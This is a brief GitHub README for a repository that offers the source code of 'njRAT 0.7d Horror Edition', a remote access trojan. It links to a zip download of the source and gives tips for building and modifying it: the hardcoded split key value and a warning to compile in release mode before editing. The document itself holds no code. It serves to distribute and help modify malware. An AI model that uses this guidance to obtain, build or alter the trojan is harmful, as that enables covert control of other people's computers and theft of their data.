Frido-Cpp/SOURCE-CODE-njRAT-0.7d-Horror-Edition/README.md

  njRAT 0.7d Horror Edition - SRC is in RAR file because github not allow upload more than 100 file at once downlaod from here: https://github.com/De-eloper/SOURCE-CODE-njRAT-0.7d-Horror-Edition/archive/refs/heads/main.zip

+note that changing split key isnt working, i ran into error trying to mod njrat src split key before it will not function or respond to commands for some reason, i dont have a fix to it so split key is stuck for Y262SUCZ4UJJ

 before editing or opening code/forms in the njRAT 0.7d Horror Edition - SRC, compile in release mode! you will run into unfixable errors if you do not do that first!